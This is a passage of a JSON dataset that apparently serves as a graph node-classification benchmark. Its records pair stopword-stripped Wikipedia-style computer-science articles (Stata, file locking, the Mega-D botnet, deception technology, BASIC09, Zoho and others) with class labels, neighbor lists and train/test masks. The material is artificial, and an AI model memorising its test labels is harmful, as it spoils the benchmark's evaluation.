nondeterministic grammars efficient expected although glr parsing developed 1980s many new language definitions parser generators continue based lalr lr parsing present day chomsky initially hoped overcome limitations context-free grammars adding transformation rules rules another standard device traditional linguistics e.g passivization english much generative grammar devoted finding ways refining descriptive mechanisms phrase-structure grammar transformation rules exactly kinds things expressed natural language actually allows allowing arbitrary transformations meet goal much powerful turing complete unless significant restrictions added e.g transformations introduce rewrite symbols context-free fashion chomsky general position regarding non-context-freeness natural language held since although specific examples regarding inadequacy context-free grammars terms weak generative capacity later disproved gerald gazdar geoffrey pullum argued despite non-context-free constructions natural language cross-serial dependencies swiss german reduplication bambara vast majority forms natural language indeed context-free",
    "neighbors": [
      512,
      6274,
      5635,
      5894,
      1672,
      10890,
      3468,
      2831,
      5880,
      2065,
      9871,
      5651,
      5399,
      1952,
      1956,
      9002,
      6841,
      10560,
      7876,
      4293,
      8262,
      10569,
      10953,
      1611,
      846,
      1490,
      7634,
      6102,
      5464,
      11490,
      4070,
      10732,
      1652,
      2936,
      3577,
      7805
    ],
    "mask": "None"
  },
  {
    "node_id": 2317,
    "label": 9,
    "text": "Stata:stata stata general-purpose statistical software package created 1985 statacorp users work research especially fields economics sociology political science biomedicine epidemiology stata capabilities include data management statistical analysis graphics simulations regression custom programming also system disseminate user-written programs lets grow continuously name stata syllabic abbreviation words statistics data faq official forum stata insists correct english pronunciation stata must remain mystery stay-ta sta-ta stah-ta considered acceptable four major builds version stata small stata smaller student version educational purchase longer available stata always emphasized command-line interface facilitates replicable analyses starting version 8.0 however stata included graphical user interface based qt framework uses menus dialog boxes give access nearly built-in commands generates code always displayed easing transition command line interface flexible scripting language dataset viewed edited spreadsheet format version 11 commands executed data browser editor opened stata open single dataset one time stata holds entire dataset random-access virtual memory limits use extremely large datasets mitigated extent efficient internal storage integer storage types occupy one two bytes rather four single-precision 4 bytes rather double-precision 8 bytes default floating-point numbers dataset always rectangular format variables hold number observations mathematical terms vectors length although entries may missing values stata import data variety formats includes ascii data formats csv databank formats spreadsheet formats including various excel formats stata proprietary file formats changed time although every stata release includes new dataset format every version stata read older dataset formats write current recent previous dataset format using saveold command thus current stata release always open datasets created older versions older versions read newer format datasets stata read write sas xport format datasets natively using fdause fdasave commands econometric applications including gretl directly import stata file formats stata allows user-written commands distributed so-called ado-files straightforwardly downloaded internet indistinguishable user built-in commands respect stata combines extensibility often associated open-source packages features usually associated commercial packages software verification technical support professional documentation user-written commands later adopted statacorp become part subsequent official release appropriate checking certification documentation stata active email list august 1994 statalist 1000 messages per month turned web forum march 2014 still called statalist statacorp employees regularly contribute statalist maintained marcello pagano harvard school public health statacorp articles use stata new user-written commands published quarterly peer-reviewed stata journal stata journal quarterly publication containing articles statistics data analysis teaching methods effective use stata language user group meetings held annually united states stata conference uk germany italy less frequently several countries annual stata conference held united states hosted statacorp lp local stata distributors host user group meetings countries however stata developers frequently travel present meetings established societies act 10 may 2008 singapore stata users group world first government-approved users group registration 2048/2008 unique entity t08ss0091a slogan shaping data meaningfully non-profit organisation stataugs organise regular meetings provides programming statistical advice users singapore informal means active members stataugs mostly engaged biomedical research perform linear ols regression x optional part allows restrict sample used command subset example command applied females sample one could specify female == 1. br perform logistic regression x display scatter plot x restricted values x 10 perform ols regression x white heteroscedasticity-consistent standard errors calculate akaike information criterion aic bayesian information criterion bic regression code fizzbuzz since 2000 statacorp released new major release stata incrementing integer part version number roughly every two years users must pay fee wish upgrade latest major release minor releases incrementing decimal part version number sometimes made available major releases available free downloadable updates licence previous major release dates releases available stata website stata 16 released june 26 2019 stata versioning system designed give high degree backward compatibility ensuring code written previous releases continues work however users careful save open data among different versions",
    "neighbors": [
      5129,
      7945,
      3980,
      6797,
      7950,
      11539,
      2457,
      7580,
      7326,
      7983,
      6962,
      9780,
      823,
      6718,
      5830,
      5703,
      4808,
      5833,
      4042,
      5450,
      2383,
      2000,
      9944,
      2652,
      1501,
      10848,
      4840,
      363,
      5612,
      7924,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2318,
    "label": 8,
    "text": "Focused_crawler:focused crawler focused crawler web crawler collects web pages satisfy specific property carefully prioritizing crawl frontier managing hyperlink exploration process predicates may based simple deterministic surface properties example crawler mission may crawl pages .jp domain predicates may softer comparative e.g. crawl pages baseball crawl pages large pagerank important page property pertains topics leading topical crawlers example topical crawler may deployed collect pages solar power swine flu even abstract concepts like controversy minimizing resources spent fetching pages topics crawl frontier management may device used focused crawlers may use web directory web text index backlinks web artifact focused crawler must predict probability unvisited page relevant actually downloading page possible predictor anchor text links approach taken pinkerton crawler developed early days web topical crawling first introduced filippo menczer chakrabarti et al coined term focused crawler used text classifier prioritize crawl frontier andrew mccallum co-authors also used reinforcement learning focus crawlers diligenti et al traced context graph leading relevant pages text content train classifiers form online reinforcement learning used along features extracted dom tree text linking pages continually train classifiers guide crawl review topical crawling algorithms menczer et al show simple strategies effective short crawls sophisticated techniques reinforcement learning evolutionary adaptation give best performance longer crawls shown spatial information important classify web documents another type focused crawlers semantic focused crawler makes use domain ontologies represent topical maps link web pages relevant ontological concepts selection categorization purposes addition ontologies automatically updated crawling process dong et al introduced ontology-learning-based crawler using support vector machine update content ontological concepts crawling web pages crawlers also focused page properties topics cho et al study variety crawl prioritization policies effects link popularity fetched pages najork weiner show breadth-first crawling starting popular seed pages leads collecting large-pagerank pages early crawl refinements involving detection stale poorly maintained pages reported eiron et al. kind semantic focused crawler making use idea reinforcement learning introduced meusel et al using online-based classification algorithms combination bandit-based selection strategy efficiently crawl pages markup languages like rdfa microformats microdata performance focused crawler depends richness links specific topic searched focused crawling usually relies general web search engine providing starting points davison presented studies web links text explain focused crawling succeeds broad topics similar studies presented chakrabarti et al. seed selection important focused crawlers significantly influence crawling efficiency whitelist strategy start focus crawl list high quality seed urls limit crawling scope domains urls high quality seeds selected based list url candidates accumulated sufficient long period general web crawling whitelist updated periodically created",
    "neighbors": [
      2566,
      3979,
      140,
      11284,
      1913,
      2459,
      3744,
      3875,
      944,
      8639,
      8769,
      10313,
      714,
      1240,
      8046,
      113,
      3191,
      8440,
      4473
    ],
    "mask": "None"
  },
  {
    "node_id": 2319,
    "label": 2,
    "text": "TextEdit_(API):textedit api textedit name collection application programming interfaces apis classic mac os performing text editing apis originally designed provide common text handling system support text entry fields dialog boxes simple text editing within macintosh gui time extended provide advanced text editing features limited original scope led fundamental limitations apple repeatedly stated textedit word processor therefore providing rich text editing always left third-party developers basic limitations textedit include first incarnation textedit provided support single style text applied text block adequate intended use supporting text entry fields later support added styled text textedit could used complex text editing tasks text editing areas web browsers etc textedit remains part carbon api macos superseded numerous solutions including atsui carbon third party waste text engine well nstext related classes within cocoa",
    "neighbors": [
      576,
      9700
    ],
    "mask": "Test"
  },
  {
    "node_id": 2320,
    "label": 1,
    "text": "Relational_data_stream_management_system:relational data stream management system relational data stream management system rdsms distributed in-memory data stream management system dsms designed use standards-compliant sql queries process unstructured structured data streams real-time unlike sql queries executed traditional rdbms return result exit sql queries executed rdsms exit generating results continuously new data become available continuous sql queries rdsms use sql window function analyze join aggregate data streams fixed sliding windows windows specified time-based row-based continuous sql queries rdsms conform ansi sql standards common rdsms sql query performed declarative codice_1 statement continuous sql codice_1 operates data across one data streams optional keywords clauses include codice_3 optional codice_4 subclause specify rules joining multiple data streams codice_5 clause comparison predicate restrict records returned query codice_6 project streams common values smaller set codice_7 filter records resulting codice_6 codice_9 sort results following example continuous data stream aggregation using codice_1 query aggregates sensor stream weather monitoring station codice_1query aggregates minimum maximum average temperature values one-second time period returning continuous stream aggregated results one second intervals rdsms sql queries also operate data streams time row-based windows following example shows second continuous sql query using codice_12 clause one-second duration codice_12 clause changes behavior query output result new record arrives hence output stream incrementally updated results zero result latency",
    "neighbors": [
      10413
    ],
    "mask": "Test"
  },
  {
    "node_id": 2321,
    "label": 2,
    "text": "DeLi_Linux:deli linux desktop light linux deli linux short desktop linux distribution old pcs version 0.6.1 deli linux based slackware 7 using linux 2.2 deli linux version 0.7 development scratch linux 2.4.33.3 longer based slackware os still used slackware package management additionally new port system based crux deli linux based uclibc instead gnu c library port openbsd korn shell used default shell version 0.8 introduced pacman package manager 0.8 series focus internationalisation version 0.8.0 also switched web browser netsurf skipstone previously konqueror embedded dillo deli linux pre-packaged abiword siag office office suites web browser netsurf skipstone included email clients mutt sylpheed window managers icewm fluxbox included editing deli linux offers e3 elvis beaver since deli linux ships lightweight software many popular open source packages included gnome kde emacs mozilla thunderbird deli linux needs 386 32 mb ram minimum however linux swap partition needs selected setup run deli less 48 mb ram work smoothly 486 full installation packages requires nearly 750 mb hard disk space august 2010 developers announced deli linux discontinued instead two successor projects connochaetos deli cate connochaetos created 2010 arch linux derivative targeting i586 pentium 1 later processors time arch required least i686 trying follow gnu free system distribution guidelines fsdg discontinued july 2013 due maintainer lack time project financial situation project failure get endorsement free software foundation fsdg-compliant however june 2015 development connochaetos resumed longer derivative arch linux derivative slackware salix os another project deli cate runs 386 486 pentium-class machines",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      11418,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      788,
      1813,
      5397,
      4887,
      6934,
      8992,
      10530,
      6436,
      2853,
      3369,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      7152,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 2322,
    "label": 6,
    "text": "File_locking:file locking file locking mechanism restricts access computer file allowing one user process access specific time systems implement locking prevent classic interceding update scenario typical example race condition enforcing serialization update processes given file following example illustrates interceding update problem operating systems support concept record locking means individual records within given file may locked thereby increasing number concurrent update processes database maintenance uses file locking whereby serialize access entire physical file underlying database although prevent process accessing file efficient individually locking large number regions file removing overhead acquiring releasing lock poor use file locks like computer lock result poor performance deadlocks file locking may also refer additional security applied computer user either using windows security ntfs permissions installing third party file locking software ibm pioneered file locking 1963 use mainframe computers using os/360 termed exclusive control microsoft windows uses three distinct mechanisms manage access shared files windows inherits semantics share-access controls ms-dos system sharing introduced ms-dos 3.3 thus application must explicitly allow sharing opens file otherwise exclusive read write delete access file closed types access retrieve attributes file allowed file opened shared access applications may use byte-range locking control access specific regions file byte-range locks specify region file offset length type lock shared exclusive note region file locked required data within file applications sometimes exploit ability implement functionality applications use file read/write apis windows byte-range locks enforced also referred mandatory locks file systems execute within windows applications use file mapping apis windows byte-range locks enforced also referred advisory locks byte-range locking may also side-effects windows system example windows file-sharing mechanism typically disable client side caching file clients byte-range locks used client control file access client observe slower access read write operations must sent server file stored improper error-handling application program lead scenario file locked either using share access byte-range file locking accessed applications user may able restore file access manually terminating malfunctioning program typically done task manager utility sharing mode dwsharemode parameter createfile function used open files determines file-sharing sharing mode specified allow sharing file read write delete access combination subsequent attempts open file must compatible previously granted sharing-access file file closed sharing-access restrictions adjusted remove restrictions imposed specific file open byte-range locking type determined dwflags parameter lockfileex function used lock region file windows api function lockfile also used acquires exclusive lock region file file containing executable program file currently running computer system program e.g exe com dll cpl binary program file format normally locked operating system preventing application modifying deleting attempt denied sharing violation error despite fact program file opened application however access still allowed example running application file renamed copied read even executing files accessed applications windows using file handles file handles explored process explorer utility utility also used force-close handles without needing terminate application holding cause undefined behavior since program receive unexpected error using force-closed handle may even operate unexpected file since handle number may recycled microsoft windows xp server 2003 editions introduced volume snapshot vss capability ntfs allowing open files accessed backup software despite exclusive locks however unless software rewritten specifically support feature snapshot crash consistent properly supported applications assist operating system creating transactionally consistent snapshots commercial software accessing locked files windows include file access manager open file manager work installing drivers access files kernel mode unix-like operating systems including linux apple macos normally automatically lock open files several kinds file-locking mechanisms available different flavors unix many operating systems support one kind compatibility common mechanism two mechanisms may separate may implemented atop although types locks configured mandatory file locks unix default advisory means cooperating processes may use locks coordinate access file among uncooperative processes also free ignore locks access file way choose words file locks lock file lockers i/o two kinds locks offered shared locks exclusive locks case codice_1 different kinds locks may applied different sections byte ranges file else whole file shared locks held multiple processes time exclusive lock held one process coexist shared lock acquire shared lock process must wait processes hold exclusive locks acquire exclusive lock process must wait processes hold either kind lock unlike locks created codice_1 created codice_3 preserved across codice_4s making useful forking servers therefore possible one process hold exclusive lock file provided processes share filial relationship exclusive lock initially created single process duplicated across codice_4 shared locks sometimes called read locks exclusive locks sometimes called write locks however locks unix advisory n't enforced thus possible database concept shared writes vs. exclusive writes example changing field place may permitted shared access whereas garbage-collecting rewriting database may require exclusive access file locks apply actual file rather file name important since unix allows multiple names refer file together non-mandatory locking leads great flexibility accessing files multiple processes hand cooperative locking approach lead problems process writes file without obeying file locks set processes reason unix-like operating systems also offer limited support mandatory locking systems file whose setgid bit whose group execution bit file opened subject automatic mandatory locking underlying filesystem supports however non-local nfs partitions tend disregard bit file subject mandatory locking attempts read region locked exclusive lock write region locked shared exclusive lock block lock released strategy first originated system v seen today solaris hp-ux linux operating systems part posix however bsd-derived operating systems freebsd openbsd netbsd apple macos support linux also supports mandatory locking special -o mand parameter filesystem mounting rarely used unix-like operating systems prevent attempts open executable file running program writing third form locking separate provided codice_1 codice_3 one process hold exclusive codice_3 given file exclusive lock duplicated across later codice_4 simplifies coding network servers helps prevent race conditions confusing unaware mandatory locks effect codice_10 system call consequently certain programs may effectively circumvent mandatory locking authors advanced programming unix environment second edition observed codice_11 editor indeed page 456 whether codice_3 locks work network filesystems nfs implementation dependent bsd systems codice_3 calls file descriptor open file nfs-mounted partition successful no-ops linux prior 2.6.12 codice_3 calls nfs files would act locally kernel 2.6.12 implement codice_3 calls nfs files using posix byte-range locks locks visible nfs clients implement codice_1-style posix locks invisible lock upgrades downgrades release old lock applying new lock application downgrades exclusive lock shared lock another application blocked waiting exclusive lock latter application may get exclusive lock lock first application means lock downgrades block may counterintuitive codice_1 locks associated file given process removed file descriptor file closed process even lock never requested file descriptor also codice_1 locks inherited child process codice_1 close semantics particularly troublesome applications call subroutine libraries may access files neither bugs occurs using real codice_3-style locks preservation lock status open file descriptors passed another process using unix domain socket implementation dependent one source lock failure occurs buffered i/o buffers assigned user local workspace rather operating system buffer pool fread fwrite commonly used buffered i/o section file read another attempt read section likely obtain data local buffer problem another user attached file local buffers thing happening fwrite data obtained buffer fread obtaining data file user could changed could use flock exclusive access prevents simultaneous writes since reads reading buffer file data changed user 1 lost user 2 overwritten best solution problem use unbuffered i/o read write flock also means using lseek instead fseek ftell course 'll make adjustments function parameters results returned generally speaking buffered i/o unsafe used shared files amiga os lock file directory acquired using codice_21 function codice_22 lock shared processes read file/directory ca n't modify delete exclusive process successfully acquires lock access modify object lock whole object part lock must released codice_23 function unlike unix operating system implicitly unlock object process terminates shell scripts programs often use strategy similar use file locking creation lock files files whose contents irrelevant although often one find process identifier holder lock file whose sole purpose signal presence resource locked lock file often best approach resource controlled regular file using methods locking files apply example lock file might govern access set related resources several different files directories group disk partitions selected access higher level protocols like servers database connections using lock files care must taken ensure operations atomic obtain lock process must verify lock file exist create whilst preventing another process creating meantime various methods include lock files often named tilde codice_27 prefixed name file locking locking resource file may named arbitrarily certain mozilla products firefox thunderbird sunbird use type file resource lock mechanism using temporary file named parent.lock unlocker utility used determine process locking file displays list processes well choices process kill task unlock etc along list file options delete rename unix-like systems utilities used inspect state file locks process filename windows systems file locked possible schedule moving deletion performed next reboot approach typically used installers replace locked system files version control systems file locking used prevent two users changing file version parallel saving second user overwrite first user changed implemented marking locked files read-only file system user wanting change file performs unlock also called checkout operation check-in store operation done lock reverted nobody else allowed unlock file",
    "neighbors": [
      2432,
      6787,
      6921,
      8080,
      2193,
      10387,
      5397,
      1304,
      6813,
      2974,
      671,
      8991,
      9762,
      10786,
      6184,
      7983,
      2995,
      4919,
      823,
      11193,
      5179,
      9025,
      3914,
      9166,
      8404,
      5078,
      10711,
      10967,
      4074,
      8954,
      8301,
      3826,
      5754,
      3323,
      3326
    ],
    "mask": "Test"
  },
  {
    "node_id": 2323,
    "label": 2,
    "text": "Intent_(Android):intent android intent android operating system software mechanism allows users coordinate functions different activities achieve task intent messaging object provides facility performing late runtime binding code different applications android development environment significant use launching activities thought glue activities intents provide inter-application messaging system encourages collaboration component reuse intent basically passive data structure holding abstract description action performed dummies likens intent flicking switch intent turn light perform action flipping switch position concept created way allow developers easily remix different apps allow type task called activity handled application best suited even provided third party although concept new android architecture n't require elevated privileges access components makes open platform activities android defined classes control life cycle task user interface activities supported application declared manifest applications read activities supported intents one application start particular activities different application latter supports message type intent analysis 2011 researchers university california berkeley found intents pose security risk allowing attackers read content messages insert malicious messages applications",
    "neighbors": [
      11361,
      7804
    ],
    "mask": "None"
  },
  {
    "node_id": 2324,
    "label": 4,
    "text": "Deception_technology:deception technology deception technology emerging category cyber security defense deception technology products detect analyze defend zero-day advanced attacks often real time automated accurate provide insight malicious activity within internal networks may unseen types cyber defense deception technology enables proactive security posture seeking deceive attackers detect defeat allowing enterprise return normal operations existing defense-in-depth cyber technologies struggled increasing wave sophisticated persistent human attackers technologies seek primarily defend perimeter firewalls end-point security defend perimeter 100 certainty cyber-attackers penetrate networks move unimpeded months stealing data intellectual property heuristics may find attacker within network often generate many alerts critical alerts missed since 2014 attacks accelerated evidence cyber-attackers penetrating traditional defenses rapidly increasing rate deception technology considers human attacker point view method exploiting navigating networks identify exfiltrate data integrates existing technologies provide new visibility internal networks share high probability alerts threat intelligence existing infrastructure deception technology automates creation traps decoys and/or lures mixed among within existing resources provide layer protection stop attackers penetrated network traps decoys assets either use real licensed operating system software emulations devices traps decoys use emulations also imitate medical devices automated teller machines atms retail point sale systems switches routers much lures generally real information technology resources files varying kinds placed actual assets upon penetrating network attackers seek establish backdoor use identify exfiltrate data intellectual property begin moving laterally internal vlans almost immediately look one traps decoys interacting one decoys trigger alert alerts high probability almost always coincide ongoing attack deception designed lure attacker – attacker may consider worthy asset continue injecting malware deception technology generally allows automated static dynamic analysis injected malware provides reports automation security operations personnel deception technology may also identify indicators compromise ioc suspect end-points part compromise cycle automation also allows automated memory analysis suspect end-point automatically isolating suspect end-point many partner integrations allow variety implementation paths existing enterprise government customers internet things iot devices usually scanned legacy defense depth cyber defense remain prime targets attackers within network deception technology identify attackers moving laterally network within devices integrated turnkey devices utilize embedded operating systems allow operating systems scanned closely protected embedded end-point intrusion detection software also well protected deception technology deployment network examples include process control systems scada used many manufacturing applications global basis deception technology associated discovery zombie zero attack vector wherein deception technology identified attacker utilizing malware embedded barcode readers manufactured overseas medical devices particular vulnerable cyber attacks within healthcare networks fda-certified devices closed systems accessible standard cyber defense software deception technology surround protect devices identify attackers using backdoor placement data exfiltration recent documented cyber attacks medical devices include x-ray machines ct scanners mri scanners blood gas analyzers pacs systems many networks utilizing devices protected deception technology attack vector called medical device hijack medjack estimated penetrated many hospitals worldwide specialized deception technology products capable addressing rise ransomware select products deceive ransomware engaging attack decoy resource isolating infection points alerting cyber defense software team honeypots perhaps first simple form deception honeypot appeared simply unprotected information technology resource presented attractive way prospective attacker already within network notion honeypots deceiving attackers perhaps delaying identifying ultimately supporting efforts shut attack good one potential benefits aside early honeypots exhibit challenges functionality integrity overall efficacy meeting goals key lack automation enabled broad scale deployment deployment strategy would seek cover enterprise tens thousands vlans must protected wo n't economically efficient using manual processes manual configuration gap legacy honeypots modern deception technology diminished time continue modern honeypots constitute low end deception technology space today traditional cyber defense technologies firewalls end-point security generate many alerts large enterprise alert volume may reach cases millions alerts per day security operations personnel process activity easily yet takes one successful penetration compromise entire network deception technology produces alerts end product binary process probability essentially reduced two values 0 100 party seeks identify ping enter view trap decoy utilizes lure immediately identified behavior anyone touching traps lures advantage heuristics probability-based approaches many thousands extraneous alerts techniques generate best practice shows deception technology stand-alone strategy deception technology additional compatible layer existing defense-in-depth cyber defense partner integrations make useful goal add protection advanced sophisticated human attackers successfully penetrate perimeter technical innovation deception technology received market industry analyst identified ten top technologies information security 2016 one deception technology industry analyst predicted august 2016 deception technology market currently 2016 approximately 50 100 million globally predicted 100 million 200 million revenue 2018 analyst earlier noted 2018 ... 10 percent enterprises use deception tools tactics actively participate deception operations attackers gartner also noted deception technology far underutilized technology provide serious advantages attackers cyber attackers two important analysts recently predicted market size exceeding 1 billion 2020 adoption fueled part continued highly visible targeted attacks large enterprise government institutions globally market research media estimates cumulative deception technology market value 12 billion 2017–2022 growing 19 cagr",
    "neighbors": [
      8998,
      9256,
      2953,
      10442,
      107,
      939,
      11594,
      2158,
      7983,
      4016,
      4945,
      1970,
      8692,
      7798,
      10232,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 2325,
    "label": 4,
    "text": "Mega-D_botnet:mega-d botnet mega-d also known alias ozdok botnet peak responsible sending 32 spam worldwide october 14 2008 u.s federal trade commission cooperation marshal software tracked owners botnet froze assets november 6 2009 security company fireeye inc. disabled mega-d botnet disabling command control structure akin srizbi botnet takedown late 2008 mega-d/ozdok takedown involved coordination dozens internet service providers domain name registrars non-profit organizations like shadowserver m86 security researchers estimated take immediate effect spam botnet november 9 2009 spam stopped altogether although small trickle weekend directed couple small uk-based domains monitored since botnet bounced back exceeding pre-takedown levels nov. 22 constituting 17 worldwide spam dec. 13 july 2010 researchers university california berkeley published model mega-d protocol state-machine revealing internals proprietary protocol first time protocol obtained automatic reverse engineering technique developed berkeley researchers among contributions research paper reveals flaw mega-d protocol allowing template milking i.e. unauthorized spam template downloading flaw could used acquire spam templates train spam filters spam hits network november 2010 oleg nikolaenko arrested las vegas nevada federal bureau investigation charged violations can-spam act 2003 nikolaenko suspected operating mega-d botnet create zombie network many 500,000 infected computers",
    "neighbors": [
      3072,
      10756,
      4487,
      3724,
      3347,
      4883,
      278,
      9630,
      10657,
      4648,
      939,
      46,
      10297,
      5563,
      3643,
      7739,
      7996,
      11583,
      9664,
      9154,
      8133,
      10952,
      81,
      8789,
      10457,
      7515,
      988,
      9053,
      3807,
      8032,
      3941,
      4585,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "Test"
  },
  {
    "node_id": 2326,
    "label": 0,
    "text": "Eva_Hajičová:eva hajičová eva hajičová born 23 august 1935 czech linguist specializing topic–focus articulation corpus linguistics 2006 awarded association computational linguistics acl lifetime achievement award named fellow acl 2011",
    "neighbors": [
      3668,
      4942,
      7724
    ],
    "mask": "Test"
  },
  {
    "node_id": 2327,
    "label": 9,
    "text": "BASIC09:basic09 basic09 structured basic programming language dialect developed microware behalf motorola then-new motorola 6809 cpu released february 1980 primarily used os-9 operating system released 1979 microware also released version os-9/68k 68000 microware basic contrast typical basics era basic09 includes multi-pass compiler produces compact bytecode known i-code i-code replaces number data structures found basics direct pointers code values speeding performance users compile code using codice_1 command point called directly os-9 operated native code case packed code cut-down version basic09 runtime system used runb improving memory footprint load time language includes number structured programming additions including local variables ability ignore line numbers favor named routines user-defined structures several distinct base data types including 16-bit 8-bit byte integers addition floating point strings key difference basic09 conventional basics era like canonical microsoft basic addition codice_2/codice_3 structure created separately executable blocks code code codice_2 common complete programs basics including variables local code executed stand-alone fashion codice_2s called using codice_6 command could include variables function-call semantics instance codice_7 calls procedure named codice_8 takes two parameters parameters imported procedure using codice_9 keyword example codice_10 side-effect use named procedures resulting memory workspace effect namespace respect basic09 system appears user directory callable programs contrasts typical basics one program available given time construction larger programs calling library-like code generally requires source code copy pasted separate programs basic09 user codice_11 procedures name workspace call code construct larger programs separately stored procedures addition code workspace program called codice_6 procedure name could found would look disk file name run worked basic09 code also executable program including machine language files meant basic09 could easily call system routines addition codice_6 common basic commands likewise used names instance codice_14 would print source code list procedure named bob codice_15 prints procedures currently memory adding codice_16 codice_17 added pretty printing indented loops branches improve readability one could also codice_18 codice_11 procedures storage addition organizational properties codice_2 basic09 also included number extensions flow control statements found basic provide structure instance codice_21 statement could used traditional codice_21 ... codice_23 format single line could used structured multi-line format codice_24 loops naturally structured format codice_25 placed line basic09 also added codice_26 codice_27 additional clarity working non-indexed loops also included center-exit codice_28 used codice_29 statement testing anywhere loop body basic09 included several built-in data types addition traditional string string 40-bit floating point real types found basics era also included 16-bit signed integer 8-bit unsigned byte logical boolean type boolean types packed bytes single boolean used entire 8-bit byte store single value language provided separate bytewise boolean operators bitwise operations bytes integers contrast basics also operated different base types basic09 decorate variable name indicate type instead used codice_30 definitions instance codice_31 declare two boolean variables codice_32 array five integers additionally basic09 included codice_33 keyword allowed compound types defined element listed single line separated semicolons instance defines employee record type named codice_34 three elements codice_35 codice_36 codice_37 employee_record type used definition like type instance codice_38 defines array 100 employee_record elements accessed code using dot notation instance codice_39 line numbers used basic dialects primarily way support editor users would edit particular lines code typing number text following either adding replacing lines already memory every line code number also made suitable indicating target codice_40 codice_41 compared languages like fortran separate line label used purpose basic09 normally use line numbers editor modified allow user edit lines without referring number however basic09 assume sort full-screen capability using cursor keys option instead system separate editor prompt allowed user move using keys moving forward backward one line time insert new line code without line number user left blank start statement note language case sensitive user-provided values like procedure variable names keywords keywords typed editor lower case shown upper case program codice_17ed basic09 allowed multiple statements single line code used separator instead used dialects used colon codice_43 assignment operator addition normal codice_44 codice_43 identical effect codice_44 made difference assignments comparisons obvious internal multipass compiler converts basic09 source code tokenized optimized bytecode called i-code i-code differs traditional tokenizing approach found basics number items placed directly memory instead using references looked instance ms-based interpreters variable reference code left string format variable codice_47 would represented memory three letters val execution variable encountered code interpreter look string table variables find associated storage address memory finally read value stored location table usually constructed value follows name save time final lookup contrast i-code address variable determined advance reference code replaced address avoids runtime search variable table optimizations include separate codice_24 routine used index variable integer separate integer real math libraries added performance basic09 also included codice_1 command took procedure name returned optimized version optimizations included removing non-coding instructions like code comments replacement constant expressions single value instance codice_1 would recognize codice_51 contains constants right replaces code codice_52 requires single operation runtime addition removing division square root codice_1 reduced memory footprint procedure improved performance 10 30 although common run programs within basic09 enviornment basics basic09 also shipped separate run-only version code known runb runb removed editing debugging features system half size full basic09 result purpose runb primarily run packed modules called programs meant user typed name basic09 module os/9 command line module marked packed opened run runb instead basic09 reduces memory footprint improves load time",
    "neighbors": [
      1952,
      5059,
      5635,
      7269,
      7983,
      1776,
      3413,
      4918,
      7071
    ],
    "mask": "None"
  },
  {
    "node_id": 2328,
    "label": 7,
    "text": "Zoho_Corporation:zoho corporation zoho corporation indian software development company focus zoho corporation lies web-based business tools information technology including office tools suite internet things management platform suite management software company founded 1996 sridhar vembu tony thomas pleasanton california offices seven countries global headquarters chennai 1996 2009 company known adventnet inc. adventnet expanded operations japan june 2001 zoho crm released 2005 followed releases projects creator sheet 2006 zoho expanded collaboration space release zoho docs zoho meeting 2007 2008 company added invoicing mail applications claims reached 10 lakh 1 million users august year 2009 company renamed zoho corporation online office suite name company launched grew without outside funding privately owned interview 2016 founder ceo sridhar vembu said one reasons zoho shunning outside funding financialisation associated investments would often put immense pressure funded company focus excessively return investments company would lose sight human objectives whereas beyond money also mission purpose life first zoho user conference zoholics launched 2012 year since 2005 zoho released additional applications 2017 released zoho one comprehensive suite zoho applications zoho headquartered chennai tamil nadu 2019 12 offices around world us headquarters currently pleasanton california plans move austin texas 2021 research development campus estancia park chennai zoho office tenkasi tirunelveli district tamil nadu product zoho desk built launched company operates china also offices singapore japan bulk support operations carried office chennai.zoho also office renigunta andhra pradesh operating office since 2018",
    "neighbors": [
      1539,
      526,
      4623,
      10265,
      5662,
      5666,
      9766,
      39,
      5159,
      10283,
      3121,
      5681,
      10820,
      4683,
      590,
      1102,
      7248,
      6737,
      5202,
      9305,
      4194,
      5732,
      3690,
      2170,
      9347,
      4236,
      10893,
      5268,
      6307,
      2217,
      9906,
      7352,
      4289,
      3269,
      1224,
      724,
      6367,
      2795,
      3819,
      253,
      8446,
      8451,
      272,
      4377,
      8986,
      11038,
      6444,
      8495,
      11070,
      8515,
      8520,
      4429,
      1362,
      7512,
      3428,
      10090,
      8044,
      5499,
      11646,
      6018,
      6027,
      911,
      1935,
      8592,
      405,
      2965,
      10681,
      448,
      2496,
      11201,
      9682,
      467,
      10200,
      6618,
      6632,
      1001,
      7660,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 2329,
    "label": 5,
    "text": "Radio_Link_Control:radio link control radio link control rlc layer 2 radio link protocol used umts lte air interface protocol specified 3gpp ts 25.322 umts ts 36.322 lte ts 38.322 5g new radio nr rlc located top 3gpp mac-layer pdcp-layer main tasks rlc protocol rlc features specific lte 1 re-segmentation 2 rlc sdu discard notified upper layer",
    "neighbors": [
      2752,
      3273,
      3847
    ],
    "mask": "None"
  },
  {
    "node_id": 2330,
    "label": 4,
    "text": "Fully_undetectable:fully undetectable fully undetectable usually shortened fud stand data encrypted making appear random noise also stand software detected anti-viruses scan performed term used hacker circles refer something appears clean many anti-viruses even though hacking tool",
    "neighbors": [
      9569,
      4956,
      3629,
      10309
    ],
    "mask": "Test"
  },
  {
    "node_id": 2331,
    "label": 3,
